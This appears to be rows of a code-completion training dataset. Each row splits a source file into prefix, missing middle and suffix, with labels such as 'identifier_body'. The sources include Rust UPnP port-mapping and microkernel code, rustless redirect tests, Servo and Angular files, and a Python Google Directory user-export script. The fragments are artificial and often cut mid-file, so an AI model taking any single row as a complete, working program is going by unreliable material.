this.initialize();
},
activate: function(e){
topic.publish("/dojo-mama/updateSubNav", {back: '/analytics', title: "User Locations"} );
}
})
}); | })
},
| random_line_split |
aio.rs | //! IGD async API example.
//!
//! It demonstrates how to:
//! * get external IP
//! * add port mappings
//! * remove port mappings
//!
//! If everything works fine, 2 port mappings are added, 1 removed and we're left with single
//! port mapping: External 1234 ---> 4321 Internal
use std::env;
use std::net::SocketAddrV4;
use igd::aio::search_gateway;
use igd::PortMappingProtocol;
use simplelog::{Config as LogConfig, LevelFilter, SimpleLogger};
#[tokio::main]
async fn main() | {
let ip = match env::args().nth(1) {
Some(ip) => ip,
None => {
println!("Local socket address is missing!");
println!("This example requires a socket address representing the local machine and the port to bind to as an argument");
println!("Example: target/debug/examples/io 192.168.0.198:4321");
println!("Example: cargo run --features aio --example aio -- 192.168.0.198:4321");
return;
}
};
let ip: SocketAddrV4 = ip.parse().expect("Invalid socket address");
let _ = SimpleLogger::init(LevelFilter::Debug, LogConfig::default());
let gateway = match search_gateway(Default::default()).await {
Ok(g) => g,
Err(err) => return println!("Faild to find IGD: {}", err),
};
let pub_ip = match gateway.get_external_ip().await {
Ok(ip) => ip,
Err(err) => return println!("Failed to get external IP: {}", err),
};
println!("Our public IP is {}", pub_ip);
if let Err(e) = gateway
.add_port(PortMappingProtocol::TCP, 1234, ip, 120, "rust-igd-async-example")
.await
{
println!("Failed to add port mapping: {}", e);
}
println!("New port mapping was successfully added.");
if let Err(e) = gateway
.add_port(PortMappingProtocol::TCP, 2345, ip, 120, "rust-igd-async-example")
.await
{
println!("Failed to add port mapping: {}", e);
}
println!("New port mapping was successfully added.");
if gateway.remove_port(PortMappingProtocol::TCP, 2345).await.is_err() {
println!("Port mapping was not successfully removed");
} else {
println!("Port was removed.");
}
} | identifier_body |
|
aio.rs | //! IGD async API example.
//!
//! It demonstrates how to:
//! * get external IP
//! * add port mappings
//! * remove port mappings
//!
//! If everything works fine, 2 port mappings are added, 1 removed and we're left with single
//! port mapping: External 1234 ---> 4321 Internal
use std::env;
use std::net::SocketAddrV4;
use igd::aio::search_gateway;
use igd::PortMappingProtocol;
use simplelog::{Config as LogConfig, LevelFilter, SimpleLogger};
#[tokio::main]
async fn | () {
let ip = match env::args().nth(1) {
Some(ip) => ip,
None => {
println!("Local socket address is missing!");
println!("This example requires a socket address representing the local machine and the port to bind to as an argument");
println!("Example: target/debug/examples/io 192.168.0.198:4321");
println!("Example: cargo run --features aio --example aio -- 192.168.0.198:4321");
return;
}
};
let ip: SocketAddrV4 = ip.parse().expect("Invalid socket address");
let _ = SimpleLogger::init(LevelFilter::Debug, LogConfig::default());
let gateway = match search_gateway(Default::default()).await {
Ok(g) => g,
Err(err) => return println!("Faild to find IGD: {}", err),
};
let pub_ip = match gateway.get_external_ip().await {
Ok(ip) => ip,
Err(err) => return println!("Failed to get external IP: {}", err),
};
println!("Our public IP is {}", pub_ip);
if let Err(e) = gateway
.add_port(PortMappingProtocol::TCP, 1234, ip, 120, "rust-igd-async-example")
.await
{
println!("Failed to add port mapping: {}", e);
}
println!("New port mapping was successfully added.");
if let Err(e) = gateway
.add_port(PortMappingProtocol::TCP, 2345, ip, 120, "rust-igd-async-example")
.await
{
println!("Failed to add port mapping: {}", e);
}
println!("New port mapping was successfully added.");
if gateway.remove_port(PortMappingProtocol::TCP, 2345).await.is_err() {
println!("Port mapping was not successfully removed");
} else {
println!("Port was removed.");
}
}
| main | identifier_name |
aio.rs | //! IGD async API example.
//!
//! It demonstrates how to:
//! * get external IP | //! * add port mappings
//! * remove port mappings
//!
//! If everything works fine, 2 port mappings are added, 1 removed and we're left with single
//! port mapping: External 1234 ---> 4321 Internal
use std::env;
use std::net::SocketAddrV4;
use igd::aio::search_gateway;
use igd::PortMappingProtocol;
use simplelog::{Config as LogConfig, LevelFilter, SimpleLogger};
#[tokio::main]
async fn main() {
let ip = match env::args().nth(1) {
Some(ip) => ip,
None => {
println!("Local socket address is missing!");
println!("This example requires a socket address representing the local machine and the port to bind to as an argument");
println!("Example: target/debug/examples/io 192.168.0.198:4321");
println!("Example: cargo run --features aio --example aio -- 192.168.0.198:4321");
return;
}
};
let ip: SocketAddrV4 = ip.parse().expect("Invalid socket address");
let _ = SimpleLogger::init(LevelFilter::Debug, LogConfig::default());
let gateway = match search_gateway(Default::default()).await {
Ok(g) => g,
Err(err) => return println!("Faild to find IGD: {}", err),
};
let pub_ip = match gateway.get_external_ip().await {
Ok(ip) => ip,
Err(err) => return println!("Failed to get external IP: {}", err),
};
println!("Our public IP is {}", pub_ip);
if let Err(e) = gateway
.add_port(PortMappingProtocol::TCP, 1234, ip, 120, "rust-igd-async-example")
.await
{
println!("Failed to add port mapping: {}", e);
}
println!("New port mapping was successfully added.");
if let Err(e) = gateway
.add_port(PortMappingProtocol::TCP, 2345, ip, 120, "rust-igd-async-example")
.await
{
println!("Failed to add port mapping: {}", e);
}
println!("New port mapping was successfully added.");
if gateway.remove_port(PortMappingProtocol::TCP, 2345).await.is_err() {
println!("Port mapping was not successfully removed");
} else {
println!("Port was removed.");
}
} | random_line_split |
|
env.rs | /*
* Copyright (C) 2018, Nils Asmussen <[email protected]>
* Economic rights: Technische Universitaet Dresden (Germany)
*
* This file is part of M3 (Microkernel-based SysteM for Heterogeneous Manycores).
*
* M3 is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 2 as
* published by the Free Software Foundation.
*
* M3 is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* General Public License version 2 for more details.
*/
use arch;
use base;
use cap::Selector;
use com::SliceSource;
use core::intrinsics;
use dtu::{EP_COUNT, FIRST_FREE_EP};
use env;
use kif::{INVALID_SEL, PEDesc};
use session::Pager;
use util;
use vfs::{FileTable, MountTable};
use vpe;
#[derive(Default, Copy, Clone)]
#[repr(C, packed)]
pub struct EnvData {
base: base::envdata::EnvData,
}
impl EnvData {
pub fn pe_id(&self) -> u64 {
self.base.pe_id
}
pub fn pe_desc(&self) -> PEDesc {
PEDesc::new_from(self.base.pe_desc)
}
pub fn set_pedesc(&mut self, pe: &PEDesc) {
self.base.pe_desc = pe.value();
}
pub fn argc(&self) -> usize {
self.base.argc as usize
}
pub fn set_argc(&mut self, argc: usize) {
self.base.argc = argc as u32;
}
pub fn set_argv(&mut self, argv: usize) {
self.base.argv = argv as u64;
}
pub fn sp(&self) -> usize {
self.base.sp as usize
}
pub fn set_sp(&mut self, sp: usize) {
self.base.sp = sp as u64;
}
pub fn set_entry(&mut self, entry: usize) {
self.base.entry = entry as u64;
}
pub fn heap_size(&self) -> usize {
self.base.heap_size as usize
}
pub fn set_heap_size(&mut self, size: usize) {
self.base.heap_size = size as u64;
} | pub fn has_vpe(&self) -> bool {
self.base.vpe != 0
}
pub fn vpe(&self) -> &'static mut vpe::VPE {
unsafe {
intrinsics::transmute(self.base.vpe as usize)
}
}
pub fn load_rbufs(&self) -> arch::rbufs::RBufSpace {
arch::rbufs::RBufSpace::new_with(
self.base.rbuf_cur as usize,
self.base.rbuf_end as usize
)
}
pub fn load_pager(&self) -> Option<Pager> {
match self.base.pager_sess {
0 => None,
s => Some(Pager::new_bind(s, self.base.pager_rgate).unwrap()),
}
}
pub fn load_caps_eps(&self) -> (Selector, u64) {
(
// it's initially 0. make sure it's at least the first usable selector
util::max(2 + (EP_COUNT - FIRST_FREE_EP) as Selector, self.base.caps as Selector),
self.base.eps
)
}
pub fn load_mounts(&self) -> MountTable {
if self.base.mounts_len != 0 {
let slice = unsafe {
util::slice_for(self.base.mounts as *const u64, self.base.mounts_len as usize)
};
MountTable::unserialize(&mut SliceSource::new(slice))
}
else {
MountTable::default()
}
}
pub fn load_fds(&self) -> FileTable {
if self.base.fds_len != 0 {
let slice = unsafe {
util::slice_for(self.base.fds as *const u64, self.base.fds_len as usize)
};
FileTable::unserialize(&mut SliceSource::new(slice))
}
else {
FileTable::default()
}
}
// --- gem5 specific API ---
pub fn set_vpe(&mut self, vpe: &vpe::VPE) {
self.base.vpe = vpe as *const vpe::VPE as u64;
}
pub fn exit_addr(&self) -> usize {
self.base.exit_addr as usize
}
pub fn has_lambda(&self) -> bool {
self.base.lambda == 1
}
pub fn set_lambda(&mut self, lambda: bool) {
self.base.lambda = lambda as u64;
}
pub fn set_next_sel(&mut self, sel: Selector) {
self.base.caps = sel as u64;
}
pub fn set_eps(&mut self, eps: u64) {
self.base.eps = eps;
}
pub fn set_rbufs(&mut self, rbufs: &arch::rbufs::RBufSpace) {
self.base.rbuf_cur = rbufs.cur as u64;
self.base.rbuf_end = rbufs.end as u64;
}
pub fn set_files(&mut self, off: usize, len: usize) {
self.base.fds = off as u64;
self.base.fds_len = len as u32;
}
pub fn set_mounts(&mut self, off: usize, len: usize) {
self.base.mounts = off as u64;
self.base.mounts_len = len as u32;
}
pub fn set_pager(&mut self, pager: &Pager) {
self.base.pager_sess = pager.sel();
self.base.pager_rgate = match pager.rgate() {
Some(rg) => rg.sel(),
None => INVALID_SEL,
};
}
}
pub fn get() -> &'static mut EnvData {
unsafe {
intrinsics::transmute(0x6000 as usize)
}
}
pub fn closure() -> &'static mut env::Closure {
unsafe {
intrinsics::transmute(0x6000 as usize + util::size_of::<EnvData>())
}
} | random_line_split |
|
env.rs | /*
* Copyright (C) 2018, Nils Asmussen <[email protected]>
* Economic rights: Technische Universitaet Dresden (Germany)
*
* This file is part of M3 (Microkernel-based SysteM for Heterogeneous Manycores).
*
* M3 is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 2 as
* published by the Free Software Foundation.
*
* M3 is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* General Public License version 2 for more details.
*/
use arch;
use base;
use cap::Selector;
use com::SliceSource;
use core::intrinsics;
use dtu::{EP_COUNT, FIRST_FREE_EP};
use env;
use kif::{INVALID_SEL, PEDesc};
use session::Pager;
use util;
use vfs::{FileTable, MountTable};
use vpe;
#[derive(Default, Copy, Clone)]
#[repr(C, packed)]
pub struct EnvData {
base: base::envdata::EnvData,
}
impl EnvData {
pub fn pe_id(&self) -> u64 {
self.base.pe_id
}
pub fn pe_desc(&self) -> PEDesc {
PEDesc::new_from(self.base.pe_desc)
}
pub fn set_pedesc(&mut self, pe: &PEDesc) {
self.base.pe_desc = pe.value();
}
pub fn argc(&self) -> usize {
self.base.argc as usize
}
pub fn set_argc(&mut self, argc: usize) {
self.base.argc = argc as u32;
}
pub fn set_argv(&mut self, argv: usize) {
self.base.argv = argv as u64;
}
pub fn sp(&self) -> usize {
self.base.sp as usize
}
pub fn set_sp(&mut self, sp: usize) {
self.base.sp = sp as u64;
}
pub fn set_entry(&mut self, entry: usize) {
self.base.entry = entry as u64;
}
pub fn heap_size(&self) -> usize {
self.base.heap_size as usize
}
pub fn set_heap_size(&mut self, size: usize) {
self.base.heap_size = size as u64;
}
pub fn has_vpe(&self) -> bool {
self.base.vpe != 0
}
pub fn vpe(&self) -> &'static mut vpe::VPE {
unsafe {
intrinsics::transmute(self.base.vpe as usize)
}
}
pub fn load_rbufs(&self) -> arch::rbufs::RBufSpace {
arch::rbufs::RBufSpace::new_with(
self.base.rbuf_cur as usize,
self.base.rbuf_end as usize
)
}
pub fn load_pager(&self) -> Option<Pager> {
match self.base.pager_sess {
0 => None,
s => Some(Pager::new_bind(s, self.base.pager_rgate).unwrap()),
}
}
pub fn load_caps_eps(&self) -> (Selector, u64) {
(
// it's initially 0. make sure it's at least the first usable selector
util::max(2 + (EP_COUNT - FIRST_FREE_EP) as Selector, self.base.caps as Selector),
self.base.eps
)
}
pub fn load_mounts(&self) -> MountTable {
if self.base.mounts_len != 0 {
let slice = unsafe {
util::slice_for(self.base.mounts as *const u64, self.base.mounts_len as usize)
};
MountTable::unserialize(&mut SliceSource::new(slice))
}
else {
MountTable::default()
}
}
pub fn load_fds(&self) -> FileTable {
if self.base.fds_len != 0 {
let slice = unsafe {
util::slice_for(self.base.fds as *const u64, self.base.fds_len as usize)
};
FileTable::unserialize(&mut SliceSource::new(slice))
}
else {
FileTable::default()
}
}
// --- gem5 specific API ---
pub fn set_vpe(&mut self, vpe: &vpe::VPE) {
self.base.vpe = vpe as *const vpe::VPE as u64;
}
pub fn exit_addr(&self) -> usize {
self.base.exit_addr as usize
}
pub fn has_lambda(&self) -> bool {
self.base.lambda == 1
}
pub fn set_lambda(&mut self, lambda: bool) {
self.base.lambda = lambda as u64;
}
pub fn | (&mut self, sel: Selector) {
self.base.caps = sel as u64;
}
pub fn set_eps(&mut self, eps: u64) {
self.base.eps = eps;
}
pub fn set_rbufs(&mut self, rbufs: &arch::rbufs::RBufSpace) {
self.base.rbuf_cur = rbufs.cur as u64;
self.base.rbuf_end = rbufs.end as u64;
}
pub fn set_files(&mut self, off: usize, len: usize) {
self.base.fds = off as u64;
self.base.fds_len = len as u32;
}
pub fn set_mounts(&mut self, off: usize, len: usize) {
self.base.mounts = off as u64;
self.base.mounts_len = len as u32;
}
pub fn set_pager(&mut self, pager: &Pager) {
self.base.pager_sess = pager.sel();
self.base.pager_rgate = match pager.rgate() {
Some(rg) => rg.sel(),
None => INVALID_SEL,
};
}
}
pub fn get() -> &'static mut EnvData {
unsafe {
intrinsics::transmute(0x6000 as usize)
}
}
pub fn closure() -> &'static mut env::Closure {
unsafe {
intrinsics::transmute(0x6000 as usize + util::size_of::<EnvData>())
}
}
| set_next_sel | identifier_name |
env.rs | /*
* Copyright (C) 2018, Nils Asmussen <[email protected]>
* Economic rights: Technische Universitaet Dresden (Germany)
*
* This file is part of M3 (Microkernel-based SysteM for Heterogeneous Manycores).
*
* M3 is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 2 as
* published by the Free Software Foundation.
*
* M3 is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* General Public License version 2 for more details.
*/
use arch;
use base;
use cap::Selector;
use com::SliceSource;
use core::intrinsics;
use dtu::{EP_COUNT, FIRST_FREE_EP};
use env;
use kif::{INVALID_SEL, PEDesc};
use session::Pager;
use util;
use vfs::{FileTable, MountTable};
use vpe;
#[derive(Default, Copy, Clone)]
#[repr(C, packed)]
pub struct EnvData {
base: base::envdata::EnvData,
}
impl EnvData {
pub fn pe_id(&self) -> u64 {
self.base.pe_id
}
pub fn pe_desc(&self) -> PEDesc {
PEDesc::new_from(self.base.pe_desc)
}
pub fn set_pedesc(&mut self, pe: &PEDesc) {
self.base.pe_desc = pe.value();
}
pub fn argc(&self) -> usize {
self.base.argc as usize
}
pub fn set_argc(&mut self, argc: usize) {
self.base.argc = argc as u32;
}
pub fn set_argv(&mut self, argv: usize) {
self.base.argv = argv as u64;
}
pub fn sp(&self) -> usize {
self.base.sp as usize
}
pub fn set_sp(&mut self, sp: usize) {
self.base.sp = sp as u64;
}
pub fn set_entry(&mut self, entry: usize) {
self.base.entry = entry as u64;
}
pub fn heap_size(&self) -> usize {
self.base.heap_size as usize
}
pub fn set_heap_size(&mut self, size: usize) {
self.base.heap_size = size as u64;
}
pub fn has_vpe(&self) -> bool {
self.base.vpe != 0
}
pub fn vpe(&self) -> &'static mut vpe::VPE {
unsafe {
intrinsics::transmute(self.base.vpe as usize)
}
}
pub fn load_rbufs(&self) -> arch::rbufs::RBufSpace {
arch::rbufs::RBufSpace::new_with(
self.base.rbuf_cur as usize,
self.base.rbuf_end as usize
)
}
pub fn load_pager(&self) -> Option<Pager> {
match self.base.pager_sess {
0 => None,
s => Some(Pager::new_bind(s, self.base.pager_rgate).unwrap()),
}
}
pub fn load_caps_eps(&self) -> (Selector, u64) |
pub fn load_mounts(&self) -> MountTable {
if self.base.mounts_len != 0 {
let slice = unsafe {
util::slice_for(self.base.mounts as *const u64, self.base.mounts_len as usize)
};
MountTable::unserialize(&mut SliceSource::new(slice))
}
else {
MountTable::default()
}
}
pub fn load_fds(&self) -> FileTable {
if self.base.fds_len != 0 {
let slice = unsafe {
util::slice_for(self.base.fds as *const u64, self.base.fds_len as usize)
};
FileTable::unserialize(&mut SliceSource::new(slice))
}
else {
FileTable::default()
}
}
// --- gem5 specific API ---
pub fn set_vpe(&mut self, vpe: &vpe::VPE) {
self.base.vpe = vpe as *const vpe::VPE as u64;
}
pub fn exit_addr(&self) -> usize {
self.base.exit_addr as usize
}
pub fn has_lambda(&self) -> bool {
self.base.lambda == 1
}
pub fn set_lambda(&mut self, lambda: bool) {
self.base.lambda = lambda as u64;
}
pub fn set_next_sel(&mut self, sel: Selector) {
self.base.caps = sel as u64;
}
pub fn set_eps(&mut self, eps: u64) {
self.base.eps = eps;
}
pub fn set_rbufs(&mut self, rbufs: &arch::rbufs::RBufSpace) {
self.base.rbuf_cur = rbufs.cur as u64;
self.base.rbuf_end = rbufs.end as u64;
}
pub fn set_files(&mut self, off: usize, len: usize) {
self.base.fds = off as u64;
self.base.fds_len = len as u32;
}
pub fn set_mounts(&mut self, off: usize, len: usize) {
self.base.mounts = off as u64;
self.base.mounts_len = len as u32;
}
pub fn set_pager(&mut self, pager: &Pager) {
self.base.pager_sess = pager.sel();
self.base.pager_rgate = match pager.rgate() {
Some(rg) => rg.sel(),
None => INVALID_SEL,
};
}
}
pub fn get() -> &'static mut EnvData {
unsafe {
intrinsics::transmute(0x6000 as usize)
}
}
pub fn closure() -> &'static mut env::Closure {
unsafe {
intrinsics::transmute(0x6000 as usize + util::size_of::<EnvData>())
}
}
| {
(
// it's initially 0. make sure it's at least the first usable selector
util::max(2 + (EP_COUNT - FIRST_FREE_EP) as Selector, self.base.caps as Selector),
self.base.eps
)
} | identifier_body |
redirect.rs | use rustless::server::header;
use rustless::server::status;
use rustless::{Nesting};
#[test]
fn | () {
let app = app!(|api| {
api.prefix("api");
api.post("redirect_me/:href", |endpoint| {
endpoint.handle(|client, params| {
client.redirect(params.find(&"href".to_string()).unwrap().as_string().unwrap())
})
});
});
let response = call_app!(app, Post, "http://127.0.0.1:3000/api/redirect_me/google.com").ok().unwrap();
assert_eq!(response.status, status::StatusCode::Found);
let &header::Location(ref location) = response.headers.get::<header::Location>().unwrap();
assert_eq!(location, "google.com")
}
#[test]
fn it_allows_permanent_redirect() {
let app = app!(|api| {
api.prefix("api");
api.post("redirect_me/:href", |endpoint| {
endpoint.handle(|client, params| {
client.permanent_redirect(params.find(&"href".to_string()).unwrap().as_string().unwrap())
})
});
});
let response = call_app!(app, Post, "http://127.0.0.1:3000/api/redirect_me/google.com").ok().unwrap();
assert_eq!(response.status, status::StatusCode::MovedPermanently);
let &header::Location(ref location) = response.headers.get::<header::Location>().unwrap();
assert_eq!(location, "google.com")
} | it_allows_redirect | identifier_name |
redirect.rs | use rustless::server::header;
use rustless::server::status;
use rustless::{Nesting};
#[test]
fn it_allows_redirect() {
let app = app!(|api| {
api.prefix("api");
api.post("redirect_me/:href", |endpoint| {
endpoint.handle(|client, params| {
client.redirect(params.find(&"href".to_string()).unwrap().as_string().unwrap())
})
});
});
let response = call_app!(app, Post, "http://127.0.0.1:3000/api/redirect_me/google.com").ok().unwrap();
assert_eq!(response.status, status::StatusCode::Found);
let &header::Location(ref location) = response.headers.get::<header::Location>().unwrap();
assert_eq!(location, "google.com")
}
#[test]
fn it_allows_permanent_redirect() | {
let app = app!(|api| {
api.prefix("api");
api.post("redirect_me/:href", |endpoint| {
endpoint.handle(|client, params| {
client.permanent_redirect(params.find(&"href".to_string()).unwrap().as_string().unwrap())
})
});
});
let response = call_app!(app, Post, "http://127.0.0.1:3000/api/redirect_me/google.com").ok().unwrap();
assert_eq!(response.status, status::StatusCode::MovedPermanently);
let &header::Location(ref location) = response.headers.get::<header::Location>().unwrap();
assert_eq!(location, "google.com")
} | identifier_body |
|
redirect.rs | use rustless::server::header;
use rustless::server::status;
use rustless::{Nesting};
#[test]
fn it_allows_redirect() {
let app = app!(|api| {
api.prefix("api");
api.post("redirect_me/:href", |endpoint| { | });
});
let response = call_app!(app, Post, "http://127.0.0.1:3000/api/redirect_me/google.com").ok().unwrap();
assert_eq!(response.status, status::StatusCode::Found);
let &header::Location(ref location) = response.headers.get::<header::Location>().unwrap();
assert_eq!(location, "google.com")
}
#[test]
fn it_allows_permanent_redirect() {
let app = app!(|api| {
api.prefix("api");
api.post("redirect_me/:href", |endpoint| {
endpoint.handle(|client, params| {
client.permanent_redirect(params.find(&"href".to_string()).unwrap().as_string().unwrap())
})
});
});
let response = call_app!(app, Post, "http://127.0.0.1:3000/api/redirect_me/google.com").ok().unwrap();
assert_eq!(response.status, status::StatusCode::MovedPermanently);
let &header::Location(ref location) = response.headers.get::<header::Location>().unwrap();
assert_eq!(location, "google.com")
} | endpoint.handle(|client, params| {
client.redirect(params.find(&"href".to_string()).unwrap().as_string().unwrap())
}) | random_line_split |
list.rs | /* This Source Code Form is subject to the terms of the Mozilla Public
* License, v. 2.0. If a copy of the MPL was not distributed with this
* file, You can obtain one at https://mozilla.org/MPL/2.0/. */
//! `list` computed values.
#[cfg(feature = "gecko")]
pub use crate::values::specified::list::ListStyleType;
pub use crate::values::specified::list::{QuotePair, Quotes};
| lazy_static! {
static ref INITIAL_QUOTES: Arc<Box<[QuotePair]>> = Arc::new(
vec![
QuotePair {
opening: "\u{201c}".to_owned().into_boxed_str(),
closing: "\u{201d}".to_owned().into_boxed_str(),
},
QuotePair {
opening: "\u{2018}".to_owned().into_boxed_str(),
closing: "\u{2019}".to_owned().into_boxed_str(),
},
]
.into_boxed_slice()
);
}
impl Quotes {
/// Initial value for `quotes`.
#[inline]
pub fn get_initial_value() -> Quotes {
Quotes(INITIAL_QUOTES.clone())
}
} | use servo_arc::Arc;
| random_line_split |
list.rs | /* This Source Code Form is subject to the terms of the Mozilla Public
* License, v. 2.0. If a copy of the MPL was not distributed with this
* file, You can obtain one at https://mozilla.org/MPL/2.0/. */
//! `list` computed values.
#[cfg(feature = "gecko")]
pub use crate::values::specified::list::ListStyleType;
pub use crate::values::specified::list::{QuotePair, Quotes};
use servo_arc::Arc;
lazy_static! {
static ref INITIAL_QUOTES: Arc<Box<[QuotePair]>> = Arc::new(
vec![
QuotePair {
opening: "\u{201c}".to_owned().into_boxed_str(),
closing: "\u{201d}".to_owned().into_boxed_str(),
},
QuotePair {
opening: "\u{2018}".to_owned().into_boxed_str(),
closing: "\u{2019}".to_owned().into_boxed_str(),
},
]
.into_boxed_slice()
);
}
impl Quotes {
/// Initial value for `quotes`.
#[inline]
pub fn get_initial_value() -> Quotes |
}
| {
Quotes(INITIAL_QUOTES.clone())
} | identifier_body |
list.rs | /* This Source Code Form is subject to the terms of the Mozilla Public
* License, v. 2.0. If a copy of the MPL was not distributed with this
* file, You can obtain one at https://mozilla.org/MPL/2.0/. */
//! `list` computed values.
#[cfg(feature = "gecko")]
pub use crate::values::specified::list::ListStyleType;
pub use crate::values::specified::list::{QuotePair, Quotes};
use servo_arc::Arc;
lazy_static! {
static ref INITIAL_QUOTES: Arc<Box<[QuotePair]>> = Arc::new(
vec![
QuotePair {
opening: "\u{201c}".to_owned().into_boxed_str(),
closing: "\u{201d}".to_owned().into_boxed_str(),
},
QuotePair {
opening: "\u{2018}".to_owned().into_boxed_str(),
closing: "\u{2019}".to_owned().into_boxed_str(),
},
]
.into_boxed_slice()
);
}
impl Quotes {
/// Initial value for `quotes`.
#[inline]
pub fn | () -> Quotes {
Quotes(INITIAL_QUOTES.clone())
}
}
| get_initial_value | identifier_name |
platform_location.js | /**
* This class should not be used directly by an application developer. Instead, use | *
* `PlatformLocation` encapsulates all calls to DOM apis, which allows the Router to be platform
* agnostic.
* This means that we can have different implementation of `PlatformLocation` for the different
* platforms
* that angular supports. For example, the default `PlatformLocation` is {@link
* BrowserPlatformLocation},
* however when you run your app in a WebWorker you use {@link WebWorkerPlatformLocation}.
*
* The `PlatformLocation` class is used directly by all implementations of {@link LocationStrategy}
* when
* they need to interact with the DOM apis like pushState, popState, etc...
*
* {@link LocationStrategy} in turn is used by the {@link Location} service which is used directly
* by
* the {@link Router} in order to navigate between routes. Since all interactions between {@link
* Router} /
* {@link Location} / {@link LocationStrategy} and DOM apis flow through the `PlatformLocation`
* class
* they are all platform independent.
*/
export class PlatformLocation {
/* abstract */ get pathname() { return null; }
/* abstract */ get search() { return null; }
/* abstract */ get hash() { return null; }
} | * {@link Location}. | random_line_split |
platform_location.js | /**
* This class should not be used directly by an application developer. Instead, use
* {@link Location}.
*
* `PlatformLocation` encapsulates all calls to DOM apis, which allows the Router to be platform
* agnostic.
* This means that we can have different implementation of `PlatformLocation` for the different
* platforms
* that angular supports. For example, the default `PlatformLocation` is {@link
* BrowserPlatformLocation},
* however when you run your app in a WebWorker you use {@link WebWorkerPlatformLocation}.
*
* The `PlatformLocation` class is used directly by all implementations of {@link LocationStrategy}
* when
* they need to interact with the DOM apis like pushState, popState, etc...
*
* {@link LocationStrategy} in turn is used by the {@link Location} service which is used directly
* by
* the {@link Router} in order to navigate between routes. Since all interactions between {@link
* Router} /
* {@link Location} / {@link LocationStrategy} and DOM apis flow through the `PlatformLocation`
* class
* they are all platform independent.
*/
export class PlatformLocation {
/* abstract */ get pathname() { return null; }
/* abstract */ get search() { return null; }
/* abstract */ get | () { return null; }
}
| hash | identifier_name |
platform_location.js | /**
* This class should not be used directly by an application developer. Instead, use
* {@link Location}.
*
* `PlatformLocation` encapsulates all calls to DOM apis, which allows the Router to be platform
* agnostic.
* This means that we can have different implementation of `PlatformLocation` for the different
* platforms
* that angular supports. For example, the default `PlatformLocation` is {@link
* BrowserPlatformLocation},
* however when you run your app in a WebWorker you use {@link WebWorkerPlatformLocation}.
*
* The `PlatformLocation` class is used directly by all implementations of {@link LocationStrategy}
* when
* they need to interact with the DOM apis like pushState, popState, etc...
*
* {@link LocationStrategy} in turn is used by the {@link Location} service which is used directly
* by
* the {@link Router} in order to navigate between routes. Since all interactions between {@link
* Router} /
* {@link Location} / {@link LocationStrategy} and DOM apis flow through the `PlatformLocation`
* class
* they are all platform independent.
*/
export class PlatformLocation {
/* abstract */ get pathname() { return null; }
/* abstract */ get search() { return null; }
/* abstract */ get hash() |
}
| { return null; } | identifier_body |
oauth2_getAllUsers.py | #import some things we need
import httplib2
from oauth2client.client import SignedJwtAssertionCredentials #included with the Google Apps Directory API
from apiclient.discovery import build
import csv
def downloadUsers(domain, account, customerId):
|
#open and read the csv file that contains the list of domains, account numbers, and customer IDs
domainListFile = open('domainList.csv', 'rb')
domainList = csv.reader(domainListFile)
for row in domainList:
domain = row[0] #the first entry in this row is the domain
account = row[1]
customerId = row[2]
downloadUsers(domain, account, customerId)
'''
for user in page:
primaryEmail = page.get(user['primaryEmail'])
lastLoginTime = page.get('lastLoginTime')
name = page.get('name')
isAdmin = page.get('isAdmin')
orgUnitPath = page.get('orgUnitPath')
newPage = page.get('nextPageToken')
print primaryEmail, lastLoginTime, name, isAdmin, orgUnitPath
'''
'''
#create a user
userinfo = {'primaryEmail': '[email protected]',
'name': { 'givenName': 'New', 'familyName': 'Test' },
'password': 'passwordfornewuser1',
'orgUnitPath':'/Archive'}
directoryService.users().insert(body=userinfo).execute()
'''
'''
#move a user to an org
userOrg = {'orgUnitPath':'/Archive'}
directoryService.users().patch(userKey='[email protected]', body=userOrg).execute()
'''
'''
user = directoryService.users().get(userKey = '[email protected]')
pprint.pprint(user.execute())
'''
| superAdmin = 'is@' + domain
serviceAccount = account + '@developer.gserviceaccount.com'
p12File = domain + '.p12'
scope = 'https://www.googleapis.com/auth/admin.directory.user https://www.googleapis.com/auth/admin.directory.orgunit https://www.googleapis.com/auth/admin.directory.group https://www.googleapis.com/auth/admin.directory.device.chromeos'
#read then close the key file
keyFile = file(p12File, 'rb')
key = keyFile.read()
keyFile.close()
#build credentials
credentials = SignedJwtAssertionCredentials(serviceAccount, key, scope, prn=superAdmin)
#authenticate
http = httplib2.Http()
httplib2.debuglevel = False #change this to True if you want to see the output
http = credentials.authorize(http=http)
directoryService = build(serviceName='admin', version='directory_v1', http=http)
#create and/or open a file that we'll append to
outputFileName = domain + '_userList.csv'
outputFile = open(outputFileName, 'a')
outputFile.write('primaryEmail, lastLoginTime, name, isAdmin, orgUnitPath\n') #write the headers
pageToken = None #this is the variable where we'll store the next page token
while True:
try:
page = directoryService.users().list(domain=domain, customer=customerId, maxResults='500', pageToken=pageToken).execute()
users = page['users']
for user in users: #parse the users from the page variable
primaryEmail = user['primaryEmail']
lastLoginTime = user['lastLoginTime']
name = user['name']['fullName']
isAdmin = user['isAdmin']
orgUnitPath = user['orgUnitPath']
#print primaryEmail, lastLoginTime, name, isAdmin, orgUnitPath
#log to a file
outputFile.write(primaryEmail + ',' + str(lastLoginTime) + ',' + name + ',' + str(isAdmin) + ',' + str(orgUnitPath))
outputFile.write( '\n')
pageToken = page['nextPageToken'] #this will error if there's no nextPageToken
except:
print 'We probably reached the end of ' + domain
break
outputFile.close() | identifier_body |
oauth2_getAllUsers.py | #import some things we need
import httplib2
from oauth2client.client import SignedJwtAssertionCredentials #included with the Google Apps Directory API
from apiclient.discovery import build
import csv
def downloadUsers(domain, account, customerId):
superAdmin = 'is@' + domain
serviceAccount = account + '@developer.gserviceaccount.com'
p12File = domain + '.p12'
scope = 'https://www.googleapis.com/auth/admin.directory.user https://www.googleapis.com/auth/admin.directory.orgunit https://www.googleapis.com/auth/admin.directory.group https://www.googleapis.com/auth/admin.directory.device.chromeos'
#read then close the key file
keyFile = file(p12File, 'rb')
key = keyFile.read()
keyFile.close()
#build credentials
credentials = SignedJwtAssertionCredentials(serviceAccount, key, scope, prn=superAdmin)
#authenticate
